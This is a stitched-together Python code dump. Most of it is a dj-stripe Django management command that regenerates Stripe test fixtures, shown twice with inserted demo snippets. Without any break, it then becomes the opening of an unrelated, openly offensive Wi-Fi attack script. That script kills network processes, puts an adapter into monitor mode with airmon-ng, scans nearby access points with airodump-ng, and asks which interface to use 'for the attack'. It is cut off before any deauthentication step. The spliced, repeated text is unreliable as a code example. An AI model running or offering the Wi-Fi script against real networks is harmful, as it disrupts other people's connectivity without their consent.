self.stdout.write(" creating") create_obj = deepcopy(old_obj) # create in Stripe for k in readonly_fields: create_obj.pop(k, None) if issubclass(model_class, djstripe.models.Subscription): create_obj = self.pre_process_subscription(create_obj=create_obj) obj = model_class._api_create(**create_obj) created = True self.update_fake_id_map(obj) if do_preserve_sideeffect_fields: obj = self.preserve_old_sideeffect_values( old_obj=old_obj, new_obj=obj, object_sideeffect_fields=object_sideeffect_fields, common_sideeffect_fields=common_sideeffect_fields, ) return created, obj def get_or_create_stripe_account(self, old_obj, readonly_fields): obj = djstripe.models.Account().api_retrieve() return True, obj def get_or_create_stripe_bank_account(self, old_obj, readonly_fields): customer = djstripe.models.Customer(id=old_obj["customer"]).api_retrieve() id_ = old_obj["id"] try: obj = customer.sources.retrieve(id_) created = False self.stdout.write(" found") except InvalidRequestError: self.stdout.write(" creating") create_obj = deepcopy(old_obj) # create in Stripe for k in readonly_fields: create_obj.pop(k, None) # see https://stripe.com/docs/connect/testing#account-numbers # we've stash the account number in the metadata # so we can regenerate the fixture create_obj["account_number"] = old_obj["metadata"][ "djstripe_test_fixture_account_number" ] create_obj["object"] = "bank_account" obj = customer.sources.create(source=create_obj) created = True return created, obj def get_or_create_stripe_card(self, old_obj, 
readonly_fields): customer = djstripe.models.Customer(id=old_obj["customer"]).api_retrieve() id_ = old_obj["id"] try: obj = customer.sources.retrieve(id_) created = False self.stdout.write(" found") except InvalidRequestError: self.stdout.write(" creating") create_obj = deepcopy(old_obj) # create in Stripe for k in readonly_fields: create_obj.pop(k, None) obj = customer.sources.create(**{"source": "tok_visa"}) for k, v in create_obj.items(): setattr(obj, k, v) obj.save() created = True return created, obj def get_or_create_stripe_source(self, old_obj, readonly_fields): customer = djstripe.models.Customer(id=old_obj["customer"]).api_retrieve() id_ = old_obj["id"] try: obj = customer.sources.retrieve(id_) created = False self.stdout.write(" found") except InvalidRequestError: self.stdout.write(" creating") create_obj = deepcopy(old_obj) # create in Stripe for k in readonly_fields: create_obj.pop(k, None) source_obj = djstripe.models.Source._api_create( **{"token": "tok_visa", "type": "card"} ) obj = customer.sources.create(**{"source": source_obj.id}) for k, v in create_obj.items(): setattr(obj, k, v) obj.save() created = True return created, obj def get_or_create_stripe_invoice(self, old_obj, writable_fields): subscription = djstripe.models.Subscription( id=old_obj["subscription"] ).api_retrieve() id_ = subscription["latest_invoice"] try: obj = djstripe.models.Invoice(id=id_).api_retrieve() created = False self.stdout.write(f" found {id_}") except InvalidRequestError: assert False, "Expected to find invoice via subscription" for k in writable_fields: if isinstance(obj.get(k), dict): # merge dicts (eg metadata) obj[k].update(old_obj.get(k, {})) else: obj[k] = old_obj[k] obj.save() return created, obj def get_or_create_stripe_charge(self, old_obj, writable_fields): invoice = djstripe.models.Invoice(id=old_obj["invoice"]).api_retrieve() id_ = invoice["charge"] try: obj = djstripe.models.Charge(id=id_).api_retrieve() created = False self.stdout.write(f" found {id_}") except InvalidRequestError: assert False, "Expected to find charge via invoice" for k in writable_fields: if isinstance(obj.get(k), dict): # merge dicts (eg metadata) obj[k].update(old_obj.get(k, {})) else: obj[k] = old_obj[k] obj.save() return created, obj def get_or_create_stripe_payment_intent(self, old_obj, writable_fields): invoice = djstripe.models.Invoice(id=old_obj["invoice"]).api_retrieve() id_ = invoice["payment_intent"] try: obj = djstripe.models.PaymentIntent(id=id_).api_retrieve() created = False self.stdout.write(f" found {id_}") except InvalidRequestError: assert False, "Expected to find payment_intent via invoice" for k in writable_fields: if isinstance(obj.get(k), dict): # merge dicts (eg metadata) obj[k].update(old_obj.get(k, {})) else: obj[k] = old_obj[k] obj.save() return created, obj def get_or_create_stripe_payment_method(self, old_obj, writable_fields): id_ = old_obj["id"] customer_id = old_obj["customer"] type_ = old_obj["type"] try: obj = djstripe.models.PaymentMethod(id=id_).api_retrieve() created = False self.stdout.write(" found") except InvalidRequestError: self.stdout.write(" creating") obj = djstripe.models.PaymentMethod()._api_create( type=type_, card={"token": "tok_visa"} ) stripe.PaymentMethod.attach( obj["id"], customer=customer_id, api_key=djstripe.settings.STRIPE_SECRET_KEY, ) for k in writable_fields: if isinstance(obj.get(k), dict): # merge dicts (eg metadata) obj[k].update(old_obj.get(k, {})) else: obj[k] = old_obj[k] obj.save() created = True return created, obj def 
get_or_create_stripe_balance_transaction(self, old_obj): source = old_obj["source"] if source.startswith("ch_"): charge = djstripe.models.Charge(id=source).api_retrieve() id_ = djstripe.models.StripeModel._id_from_data( charge["balance_transaction"] ) try: obj = djstripe.models.BalanceTransaction(id=id_).api_retrieve() created = False self.stdout.write(f" found {id_}") except InvalidRequestError: assert False, "Expected to find balance transaction via source" return created, obj def save_fixture(self, obj): type_name = obj["object"] id_ = self.update_fake_id_map(obj) fixture_path = tests.FIXTURE_DIR_PATH.joinpath(f"{type_name}_{id_}.json") with fixture_path.open("w") as f: json_str = self.fake_json_ids(json.dumps(obj, indent=4)) f.write(json_str) return fixture_path def pre_process_subscription(self, create_obj): # flatten plan/items on create items = create_obj.get("items", {}).get("data", []) if len(items): # don't try and create with both plan and item (list of plans) create_obj.pop("plan", None) create_obj.pop("quantity", None) # TODO - move this to SubscriptionItem handling? subscription_item_create_fields = { "plan", "billing_thresholds", "metadata", "quantity", "tax_rates", } create_items = [] for item in items: create_item = { k: v for k, v in item.items() if k in subscription_item_create_fields } create_item["plan"] = djstripe.models.StripeModel._id_from_data( create_item["plan"] ) create_items.append(create_item) create_obj["items"] = create_items else: # don't try and send empty items list create_obj.pop("items", None) create_obj["plan"] = djstripe.models.StripeModel._id_from_data( create_obj["plan"] ) return create_obj def preserve_old_sideeffect_values( self, old_obj, new_obj, object_sideeffect_fields, common_sideeffect_fields ): """ Try to preserve values of side-effect fields from old_obj, to reduce churn in fixtures """ object_name = new_obj.get("object") sideeffect_fields = object_sideeffect_fields.get(object_name, set()).union( set(common_sideeffect_fields) ) old_obj = old_obj or {} for f, old_val in old_obj.items(): try: new_val = new_obj[f] except KeyError: continue if isinstance(new_val, stripe.api_resources.ListObject): # recursively process nested lists for n, (old_val_item, new_val_item) in enumerate( zip(old_val.get("data", []), new_val.data) ): new_val.data[n] = self.preserve_old_sideeffect_values( old_obj=old_val_item, new_obj=new_val_item, object_sideeffect_fields=object_sideeffect_fields, common_sideeffect_fields=common_sideeffect_fields, ) elif isinstance(new_val, stripe.stripe_object.StripeObject): # recursively process nested objects new_obj[f] = self.preserve_old_sideeffect_values( old_obj=old_val, new_obj=new_val, object_sideeffect_fields=object_sideeffect_fields, common_sideeffect_fields=common_sideeffect_fields, ) elif ( f in sideeffect_fields and type(old_val) == type(new_val) and old_val != new_val ): # only preserve old values if the type is the same new_obj[f] = old_val return new_obj
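# Illustrative sketch (standalone, not wired into the command above): a minimal
# demonstration of the id-faking approach used by fake_json_ids()/unfake_json_ids().
# Because the swap is a plain string replace on the serialized JSON, the fake<->real
# mapping can be applied and reversed without walking the object graph. The ids and
# the mapping below are hypothetical, made up for this demo only.
import json as _json

_demo_fake_id_map = {"card_fake_0001": "card_1AbCdEfGhIjKlMnO"}  # fake id -> (made-up) real id

_demo_fixture = {"object": "card", "id": "card_fake_0001"}
_demo_serialized = _json.dumps(_demo_fixture)

# fake -> real, as unfake_json_ids() does before talking to Stripe
for _fake, _real in _demo_fake_id_map.items():
    _demo_serialized = _demo_serialized.replace(_fake, _real)
assert _json.loads(_demo_serialized)["id"] == "card_1AbCdEfGhIjKlMnO"

# real -> fake, as fake_json_ids() does before writing the fixture to disk
for _fake, _real in _demo_fake_id_map.items():
    _demo_serialized = _demo_serialized.replace(_real, _fake)
assert _json.loads(_demo_serialized)["id"] == "card_fake_0001"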
import json from copy import deepcopy from typing import Dict, List, Set, Type import stripe.api_resources import stripe.stripe_object import tests from django.core.management import BaseCommand from stripe.error import InvalidRequestError import djstripe.models import djstripe.settings """ Key used to store fake ids in the real stripe object's metadata dict """ FAKE_ID_METADATA_KEY = "djstripe_test_fake_id" class Command(BaseCommand): """ This does the following: 1) Load existing fixtures from JSON files 2) Attempts to read the corresponding objects from Stripe 3) If found, for types Stripe doesn't allow us to choose ids for, we build a map between the fake ids in the fixtures and real Stripe ids 3) If not found, creates objects in Stripe from the fixtures 4) Save objects back as fixtures, using fake ids if available The rationale for this is so that the fixtures can automatically be updated with Stripe schema changes running this command. This should make keeping our tests and model schema compatible with Stripe schema changes less pain-staking and simplify the process of upgrading the targeted Stripe API version. """ help = "Command to update test fixtures using a real Stripe account." fake_data_map = {} # type: Dict[Type[djstripe.models.StripeModel], List] fake_id_map = {} # type: Dict[str, str] def add_arguments(self, parser): parser.add_argument( "--delete-stale", action="store_true", help="Delete any untouched fixtures in the directory", ) parser.add_argument( "--update-sideeffect-fields", action="store_true", help="Don't preserve sideeffect fields such as 'created'", ) def handle(self, *args, **options): do_delete_stale_fixtures = options["delete_stale"] do_preserve_sideeffect_fields = not options["update_sideeffect_fields"] common_readonly_fields = ["object", "created", "updated", "livemode"] common_sideeffect_fields = ["created"] # TODO - is it be possible to get a list of which fields are writable from # the API? maybe using https://github.com/stripe/openapi ? # (though that's only for current version) """ Fields that we treat as read-only. Most of these will cause an error if sent to the Stripe API. """ model_extra_readonly_fields = { djstripe.models.Account: ["id"], djstripe.models.Customer: [ "account_balance", "currency", "default_source", "delinquent", "invoice_prefix", "subscriptions", "sources", ], djstripe.models.BankAccount: [ "id", "bank_name", "customer", "last4", "fingerprint", "status", ], djstripe.models.Card: [ "id", "address_line1_check", "address_zip_check", "brand", "country", "customer", "cvc_check", "dynamic_last4", "exp_month", "exp_year", "fingerprint", "funding", "last4", "tokenization_method", ], djstripe.models.PaymentIntent: ["id"], djstripe.models.PaymentMethod: ["id"], djstripe.models.Source: [ "id", "amount", "card", "client_secret", "currency", "customer", "flow", "owner", "statement_descriptor", "status", "type", "usage", ], djstripe.models.Subscription: [ "id", # not actually read-only "billing_cycle_anchor", # seem that this is replacing "billing"? 
(but they can't both be set) "collection_method", "current_period_end", "current_period_start", "latest_invoice", "start", "start_date", "status", ], } # type: Dict[Type[djstripe.models.StripeModel], List[str]] """ Fields that we don't care about the value of, and that preserving allows us to avoid churn in the fixtures """ model_sideeffect_fields = { djstripe.models.BalanceTransaction: ["available_on"], djstripe.models.Source: ["client_secret"], djstripe.models.Charge: ["receipt_url"], djstripe.models.Subscription: [ "billing_cycle_anchor", "current_period_start", "current_period_end", "start", "start_date", ], djstripe.models.SubscriptionItem: [ # we don't currently track separate fixtures for SubscriptionItems "id" ], djstripe.models.Product: ["updated"], djstripe.models.Invoice: [ "date", "finalized_at", "hosted_invoice_url", "invoice_pdf", "webhooks_delivered_at", "period_start", "period_end", # we don't currently track separate fixtures for SubscriptionItems "subscription_item", ], } # type: Dict[Type[djstripe.models.StripeModel], List[str]] object_sideeffect_fields = { model.stripe_class.OBJECT_NAME: set(v) for model, v in model_sideeffect_fields.items() } # type: Dict[str, Set[str]] self.fake_data_map = { # djstripe.models.Account: [tests.FAKE_ACCOUNT], djstripe.models.Customer: [ tests.FAKE_CUSTOMER, tests.FAKE_CUSTOMER_II, tests.FAKE_CUSTOMER_III, tests.FAKE_CUSTOMER_IV, ], djstripe.models.BankAccount: [tests.FAKE_BANK_ACCOUNT_SOURCE], djstripe.models.Card: [ tests.FAKE_CARD, tests.FAKE_CARD_II, tests.FAKE_CARD_V, ], djstripe.models.Source: [tests.FAKE_SOURCE], djstripe.models.Product: [tests.FAKE_PRODUCT], djstripe.models.Plan: [tests.FAKE_PLAN, tests.FAKE_PLAN_II], djstripe.models.Subscription: [ tests.FAKE_SUBSCRIPTION, tests.FAKE_SUBSCRIPTION_II, tests.FAKE_SUBSCRIPTION_III, tests.FAKE_SUBSCRIPTION_MULTI_PLAN, ], djstripe.models.Invoice: [tests.FAKE_INVOICE], djstripe.models.Charge: [tests.FAKE_CHARGE], djstripe.models.PaymentIntent: [tests.FAKE_PAYMENT_INTENT_I], djstripe.models.PaymentMethod: [tests.FAKE_PAYMENT_METHOD_I], djstripe.models.BalanceTransaction: [tests.FAKE_BALANCE_TRANSACTION], } self.init_fake_id_map() objs = [] # Regenerate each of the fixture objects via Stripe # We re-fetch objects in a second pass if they were created during # the first pass, to ensure nested objects are up to date # (eg Customer.subscriptions), for n in range(2): any_created = False self.stdout.write(f"Updating fixture objects, pass {n}") # reset the objects list since we don't want to keep those from # the first pass objs.clear() for model_class, old_objs in self.fake_data_map.items(): readonly_fields = ( common_readonly_fields + model_extra_readonly_fields.get(model_class, []) ) for old_obj in old_objs: created, obj = self.update_fixture_obj( old_obj=deepcopy(old_obj), model_class=model_class, readonly_fields=readonly_fields, do_preserve_sideeffect_fields=do_preserve_sideeffect_fields, object_sideeffect_fields=object_sideeffect_fields, common_sideeffect_fields=common_sideeffect_fields, ) objs.append(obj) any_created = created or any_created if not any_created: # nothing created on this pass, no need to continue break else: self.stderr.write( "Warning, unexpected behaviour - some fixtures still being created " "in second pass?" 
) # Now the fake_id_map should be complete and the objs should be up to date, # save all the fixtures paths = set() for obj in objs: path = self.save_fixture(obj) paths.add(path) if do_delete_stale_fixtures: for path in tests.FIXTURE_DIR_PATH.glob("*.json"): if path in paths: continue else: self.stdout.write("deleting {}".format(path)) path.unlink() def init_fake_id_map(self): """ Build a mapping between fake ids stored in Stripe metadata and those obj's actual ids We do this so we can have fixtures with stable ids for objects Stripe doesn't allow us to specify an id for (eg Card). Fixtures and tests will use the fake ids, when we talk to stripe we use the real ids :return: """ for fake_customer in self.fake_data_map[djstripe.models.Customer]: try: # can only access Cards via the customer customer = djstripe.models.Customer( id=fake_customer["id"] ).api_retrieve() except InvalidRequestError: self.stdout.write( f"Fake customer {fake_customer['id']} doesn't exist in Stripe yet" ) return # assume that test customers don't have more than 100 cards... for card in customer.sources.list(limit=100): self.update_fake_id_map(card) for payment_method in djstripe.models.PaymentMethod.api_list( customer=customer.id, type="card" ): self.update_fake_id_map(payment_method) for subscription in customer["subscriptions"]["data"]: self.update_fake_id_map(subscription) def update_fake_id_map(self, obj): fake_id = self.get_fake_id(obj) actual_id = obj["id"] if fake_id: if fake_id in self.fake_id_map: assert self.fake_id_map[fake_id] == actual_id, ( f"Duplicate fake_id {fake_id} - reset your test Stripe data at " f"https://dashboard.stripe.com/account/data" ) self.fake_id_map[fake_id] = actual_id return fake_id else: return actual_id def get_fake_id(self, obj): """ Get a stable fake id from a real Stripe object, we use this so that fixtures are stable :param obj: :return: """ fake_id = None if isinstance(obj, str): real_id = obj real_id_map = {v: k for k, v in self.fake_id_map.items()} fake_id = real_id_map.get(real_id) elif "metadata" in obj: # Note: not all objects have a metadata dict # (eg Account, BalanceTransaction don't) fake_id = obj.get("metadata", {}).get(FAKE_ID_METADATA_KEY) elif obj.get("object") == "balance_transaction": # assume for purposes of fixture generation that 1 balance_transaction per # source charge (etc) fake_source_id = self.get_fake_id(obj["source"]) fake_id = "txn_fake_{}".format(fake_source_id) return fake_id def fake_json_ids(self, json_str): """ Replace real ids with fakes ones in the JSON fixture Do this on the serialized JSON string since it's a simple string replace :param json_str: :return: """ for fake_id, actual_id in self.fake_id_map.items(): json_str = json_str.replace(actual_id, fake_id) return json_str def unfake_json_ids(self, json_str): """ Replace fake ids with actual ones in the JSON fixture Do this on the serialized JSON string since it's a simple string replace :param json_str: :return: """ for fake_id, actual_id in self.fake_id_map.items(): json_str = json_str.replace(fake_id, actual_id) # special-case: undo the replace for the djstripe_test_fake_id in metadata json_str = json_str.replace( f'"{FAKE_ID_METADATA_KEY}": "{actual_id}"', f'"{FAKE_ID_METADATA_KEY}": "{fake_id}"', ) return json_str def update_fixture_obj( # noqa: C901 self, old_obj, model_class, readonly_fields, do_preserve_sideeffect_fields, object_sideeffect_fields, common_sideeffect_fields, ): """ Given a fixture object, update it via stripe :param model_class: :param old_obj: :param readonly_fields: 
:return: """ # restore real ids from Stripe old_obj = json.loads(self.unfake_json_ids(json.dumps(old_obj))) id_ = old_obj["id"] self.stdout.write(f"{model_class.__name__} {id_}", ending="") # For objects that we can't directly choose the ids of # (and that will thus vary between stripe accounts) # we fetch the id from a related object if issubclass(model_class, djstripe.models.Account): created, obj = self.get_or_create_stripe_account( old_obj=old_obj, readonly_fields=readonly_fields ) elif issubclass(model_class, djstripe.models.BankAccount): created, obj = self.get_or_create_stripe_bank_account( old_obj=old_obj, readonly_fields=readonly_fields ) elif issubclass(model_class, djstripe.models.Card): created, obj = self.get_or_create_stripe_card( old_obj=old_obj, readonly_fields=readonly_fields ) elif issubclass(model_class, djstripe.models.Source): created, obj = self.get_or_create_stripe_source( old_obj=old_obj, readonly_fields=readonly_fields ) elif issubclass(model_class, djstripe.models.Invoice): created, obj = self.get_or_create_stripe_invoice( old_obj=old_obj, writable_fields=["metadata"] ) elif issubclass(model_class, djstripe.models.Charge): created, obj = self.get_or_create_stripe_charge( old_obj=old_obj, writable_fields=["metadata"] ) elif issubclass(model_class, djstripe.models.PaymentIntent): created, obj = self.get_or_create_stripe_payment_intent( old_obj=old_obj, writable_fields=["metadata"] ) elif issubclass(model_class, djstripe.models.PaymentMethod): created, obj = self.get_or_create_stripe_payment_method( old_obj=old_obj, writable_fields=["metadata"] ) elif issubclass(model_class, djstripe.models.BalanceTransaction): created, obj = self.get_or_create_stripe_balance_transaction( old_obj=old_obj ) else: try: # fetch from Stripe, using the active API version # this allows us regenerate the fixtures from Stripe # and hopefully, automatically get schema changes obj = model_class(id=id_).api_retrieve() created = False self.stdout.write(" found") except InvalidRequestError: self.stdout.write(" creating") create_obj = deepcopy(old_obj) # create in Stripe for k in readonly_fields: create_obj.pop(k, None) if issubclass(model_class, djstripe.models.Subscription): create_obj = self.pre_process_subscription(create_obj=create_obj) obj = model_class._api_create(**create_obj) created = True self.update_fake_id_map(obj) if do_preserve_sideeffect_fields: obj = self.preserve_old_sideeffect_values( old_obj=old_obj, new_obj=obj, object_sideeffect_fields=object_sideeffect_fields, common_sideeffect_fields=common_sideeffect_fields, ) return created, obj def get_or_create_stripe_account(self, old_obj, readonly_fields): obj = djstripe.models.Account().api_retrieve() return True, obj def get_or_create_stripe_bank_account(self, old_obj, readonly_fields): customer = djstripe.models.Customer(id=old_obj["customer"]).api_retrieve() id_ = old_obj["id"] try: obj = customer.sources.retrieve(id_) created = False self.stdout.write(" found") except InvalidRequestError: self.stdout.write(" creating") create_obj = deepcopy(old_obj) # create in Stripe for k in readonly_fields: create_obj.pop(k, None) # see https://stripe.com/docs/connect/testing#account-numbers # we've stash the account number in the metadata # so we can regenerate the fixture create_obj["account_number"] = old_obj["metadata"][ "djstripe_test_fixture_account_number" ] create_obj["object"] = "bank_account" obj = customer.sources.create(source=create_obj) created = True return created, obj def get_or_create_stripe_card(self, old_obj, 
readonly_fields): customer = djstripe.models.Customer(id=old_obj["customer"]).api_retrieve() id_ = old_obj["id"] try: obj = customer.sources.retrieve(id_) created = False self.stdout.write(" found") except InvalidRequestError: self.stdout.write(" creating") create_obj = deepcopy(old_obj) # create in Stripe for k in readonly_fields: create_obj.pop(k, None) obj = customer.sources.create(**{"source": "tok_visa"}) for k, v in create_obj.items(): setattr(obj, k, v) obj.save() created = True return created, obj def get_or_create_stripe_source(self, old_obj, readonly_fields): customer = djstripe.models.Customer(id=old_obj["customer"]).api_retrieve() id_ = old_obj["id"] try: obj = customer.sources.retrieve(id_) created = False self.stdout.write(" found") except InvalidRequestError: self.stdout.write(" creating") create_obj = deepcopy(old_obj) # create in Stripe for k in readonly_fields: create_obj.pop(k, None) source_obj = djstripe.models.Source._api_create( **{"token": "tok_visa", "type": "card"} ) obj = customer.sources.create(**{"source": source_obj.id}) for k, v in create_obj.items(): setattr(obj, k, v) obj.save() created = True return created, obj def get_or_create_stripe_invoice(self, old_obj, writable_fields): subscription = djstripe.models.Subscription( id=old_obj["subscription"] ).api_retrieve() id_ = subscription["latest_invoice"] try: obj = djstripe.models.Invoice(id=id_).api_retrieve() created = False self.stdout.write(f" found {id_}") except InvalidRequestError: assert False, "Expected to find invoice via subscription" for k in writable_fields: if isinstance(obj.get(k), dict): # merge dicts (eg metadata) obj[k].update(old_obj.get(k, {})) else: obj[k] = old_obj[k] obj.save() return created, obj def get_or_create_stripe_charge(self, old_obj, writable_fields): invoice = djstripe.models.Invoice(id=old_obj["invoice"]).api_retrieve() id_ = invoice["charge"] try: obj = djstripe.models.Charge(id=id_).api_retrieve() created = False self.stdout.write(f" found {id_}") except InvalidRequestError: assert False, "Expected to find charge via invoice" for k in writable_fields: if isinstance(obj.get(k), dict): # merge dicts (eg metadata) obj[k].update(old_obj.get(k, {})) else: obj[k] = old_obj[k] obj.save() return created, obj def get_or_create_stripe_payment_intent(self, old_obj, writable_fields): invoice = djstripe.models.Invoice(id=old_obj["invoice"]).api_retrieve() id_ = invoice["payment_intent"] try: obj = djstripe.models.PaymentIntent(id=id_).api_retrieve() created = False self.stdout.write(f" found {id_}") except InvalidRequestError: assert False, "Expected to find payment_intent via invoice" for k in writable_fields: if isinstance(obj.get(k), dict): # merge dicts (eg metadata) obj[k].update(old_obj.get(k, {})) else: obj[k] = old_obj[k] obj.save() return created, obj def get_or_create_stripe_payment_method(self, old_obj, writable_fields): id_ = old_obj["id"] customer_id = old_obj["customer"] type_ = old_obj["type"] try: obj = djstripe.models.PaymentMethod(id=id_).api_retrieve() created = False self.stdout.write(" found") except InvalidRequestError: self.stdout.write(" creating") obj = djstripe.models.PaymentMethod()._api_create( type=type_, card={"token": "tok_visa"} ) stripe.PaymentMethod.attach( obj["id"], customer=customer_id, api_key=djstripe.settings.STRIPE_SECRET_KEY, ) for k in writable_fields: if isinstance(obj.get(k), dict): # merge dicts (eg metadata) obj[k].update(old_obj.get(k, {})) else: obj[k] = old_obj[k] obj.save() created = True return created, obj def 
get_or_create_stripe_balance_transaction(self, old_obj): source = old_obj["source"] if source.startswith("ch_"): charge = djstripe.models.Charge(id=source).api_retrieve() id_ = djstripe.models.StripeModel._id_from_data( charge["balance_transaction"] ) try: obj = djstripe.models.BalanceTransaction(id=id_).api_retrieve() created = False self.stdout.write(f" found {id_}") except InvalidRequestError: assert False, "Expected to find balance transaction via source" return created, obj def save_fixture(self, obj): type_name = obj["object"] id_ = self.update_fake_id_map(obj) fixture_path = tests.FIXTURE_DIR_PATH.joinpath(f"{type_name}_{id_}.json") with fixture_path.open("w") as f: json_str = self.fake_json_ids(json.dumps(obj, indent=4)) f.write(json_str) return fixture_path def pre_process_subscription(self, create_obj): # flatten plan/items on create items = create_obj.get("items", {}).get("data", []) if len(items): # don't try and create with both plan and item (list of plans) create_obj.pop("plan", None) create_obj.pop("quantity", None) # TODO - move this to SubscriptionItem handling? subscription_item_create_fields = { "plan", "billing_thresholds", "metadata", "quantity", "tax_rates", } create_items = [] for item in items: create_item = { k: v for k, v in item.items() if k in subscription_item_create_fields } create_item["plan"] = djstripe.models.StripeModel._id_from_data( create_item["plan"] ) create_items.append(create_item) create_obj["items"] = create_items else: # don't try and send empty items list create_obj.pop("items", None) create_obj["plan"] = djstripe.models.StripeModel._id_from_data( create_obj["plan"] ) return create_obj def preserve_old_sideeffect_values( self, old_obj, new_obj, object_sideeffect_fields, common_sideeffect_fields ): """ Try to preserve values of side-effect fields from old_obj, to reduce churn in fixtures """ object_name = new_obj.get("object") sideeffect_fields = object_sideeffect_fields.get(object_name, set()).union( set(common_sideeffect_fields) ) old_obj = old_obj or {} for f, old_val in old_obj.items(): try: new_val = new_obj[f] except KeyError: continue if isinstance(new_val, stripe.api_resources.ListObject): # recursively process nested lists for n, (old_val_item, new_val_item) in enumerate( zip(old_val.get("data", []), new_val.data) ): new_val.data[n] = self.preserve_old_sideeffect_values( old_obj=old_val_item, new_obj=new_val_item, object_sideeffect_fields=object_sideeffect_fields, common_sideeffect_fields=common_sideeffect_fields, ) elif isinstance(new_val, stripe.stripe_object.StripeObject): # recursively process nested objects new_obj[f] = self.preserve_old_sideeffect_values( old_obj=old_val, new_obj=new_val, object_sideeffect_fields=object_sideeffect_fields, common_sideeffect_fields=common_sideeffect_fields, ) elif ( f in sideeffect_fields and type(old_val) == type(new_val) and old_val != new_val ): # only preserve old values if the type is the same new_obj[f] = old_val return new_obj
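# Illustrative sketch (standalone, not wired into the command above): a rough sketch of
# the get_fake_id()/update_fake_id_map() idea for objects whose ids Stripe assigns
# (eg Card): the stable fake id is stashed in the object's metadata under
# FAKE_ID_METADATA_KEY ("djstripe_test_fake_id") and a fake -> real map is built from it.
# The object below is a hand-written stand-in, not real Stripe output.
_demo_obj = {
    "id": "pm_1AbCdEfGhIjKlMnO",  # hypothetical real id assigned by Stripe
    "object": "payment_method",
    "metadata": {"djstripe_test_fake_id": "pm_fake_0001"},
}

_demo_fake_id_map = {}
_demo_fake = _demo_obj.get("metadata", {}).get("djstripe_test_fake_id")
if _demo_fake:
    _demo_fake_id_map[_demo_fake] = _demo_obj["id"]

# reverse lookup (real -> fake), as get_fake_id() does when handed a bare id string
_demo_real_to_fake = {v: k for k, v in _demo_fake_id_map.items()}
assert _demo_real_to_fake["pm_1AbCdEfGhIjKlMnO"] == "pm_fake_0001"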
# We will be using the subprocess module to run commands on Kali Linux. import subprocess # We require regular expressions. import re # We want to open the CSV files generated by airmon-ng, # and we'll use the built-in csv module. import csv # We want to import os because we want to check for sudo import os # We want to use time.sleep() import time # We want to move .csv files in the folder if we found any. # We'll use shutil for that. import shutil # Create a timestamp for .csv filename from datetime import datetime # Create an empty list active_wireless_networks = [] # We use this function to test if the ESSID is already in the list file. # If so we return False so we don't add it again. # If it is not in the lst we return True which will instruct the elif # statement to add it to the lst. def check_for_essid(essid, lst): check_status = True # If no ESSIDs in list add the row if len(lst) == 0: return check_status # This will only run if there are wireless access points in the list. for item in lst: # If True don't add to list. False will add it to list if essid in item["ESSID"]: check_status = False return check_status # Basic user interface header print(r"""______ _ _ ______ _ _ | _ \ (_) | | | ___ \ | | | | | | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| | | | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | | | |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | | |___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""") print("\n****************************************************************") print("\n* Copyright of David Bombal, 2021 *") print("\n* https://www.davidbombal.com *") print("\n* https://www.youtube.com/davidbombal *") print("\n****************************************************************") # If the user doesn't run the program with super user privileges, don't allow them to continue. if not 'SUDO_UID' in os.environ.keys(): print("Try running this program with sudo.") exit() # Remove .csv files before running the script. for file_name in os.listdir(): # We should only have one csv file as we delete them from the folder # every time we run the program. if ".csv" in file_name: print("There shouldn't be any .csv files in your directory. We found .csv files in your directory and will move them to the backup directory.") # We get the current working directory. directory = os.getcwd() try: # We make a new directory called /backup os.mkdir(directory + "/backup/") except: print("Backup folder exists.") # Create a timestamp timestamp = datetime.now() # We move any .csv files in the folder to the backup folder. shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name) # Regex to find wireless interfaces. We're making the assumption they will all be wlan0 or higher. wlan_pattern = re.compile("^wlan[0-9]+") # Python allows is to run system commands by using a function provided by the subprocess module. # subprocess.run(<list of command line arguments goes here>) # The script is the parent process and creates a child process which runs the system command, # and will only continue once the child process has completed. # We run the iwconfig command to look for wireless interfaces. check_wifi_result = wlan_pattern.findall(subprocess.run(["iwconfig"], capture_output=True).stdout.decode()) # No WiFi Adapter connected. 
if len(check_wifi_result) == 0: print("Please connect a WiFi adapter and try again.") exit() # Menu to select WiFi interface from print("The following WiFi interfaces are available:") for index, item in enumerate(check_wifi_result): print(f"{index} - {item}") # Ensure the WiFi interface selected is valid. Simple menu with interfaces to select from. while True: wifi_interface_choice = input("Please select the interface you want to use for the attack: ") try: if check_wifi_result[int(wifi_interface_choice)]: break except: print("Please enter a number that corresponds with the choices available.") # For easy reference we call the selected interface hacknic hacknic = check_wifi_result[int(wifi_interface_choice)] # Tell the user we're going to kill the conflicting processes. print("WiFi adapter connected!\nNow let's kill conflicting processes:") # subprocess.run(<list of command line arguments goes here>) # The script is the parent process and creates a child process which runs the system command, # and will only continue once the child process has completed. # We run the iwconfig command to look for wireless interfaces. # Killing all conflicting processes using airmon-ng kill_confilict_processes = subprocess.run(["sudo", "airmon-ng", "check", "kill"]) # Put wireless in Monitor mode print("Putting Wifi adapter into monitored mode:") put_in_monitored_mode = subprocess.run(["sudo", "airmon-ng", "start", hacknic]) # subprocess.Popen(<list of command line arguments goes here>) # The Popen method opens a pipe from a command. # The output is an open file that can be accessed by other programs. # We run the iwconfig command to look for wireless interfaces. # Discover access points discover_access_points = subprocess.Popen(["sudo", "airodump-ng","-w" ,"file","--write-interval", "1","--output-format", "csv", check_wifi_result[0] + "mon"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) # Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c. try: while True: # We want to clear the screen before we print the network interfaces. subprocess.call("clear", shell=True) for file_name in os.listdir(): # We should only have one csv file as we backup all previous csv files from the folder every time we run the program. # The following list contains the field names for the csv entries. fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key'] if ".csv" in file_name: with open(file_name) as csv_h: # This will run multiple times and we need to reset the cursor to the beginning of the file. csv_h.seek(0) # We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above. # This creates a list of dictionaries with the keys as specified in the fieldnames. csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames) for row in csv_reader: # We want to exclude the row with BSSID. if row["BSSID"] == "BSSID": pass # We are not interested in the client data. elif row["BSSID"] == "Station MAC": break # Every field where an ESSID is specified will be added to the list. elif 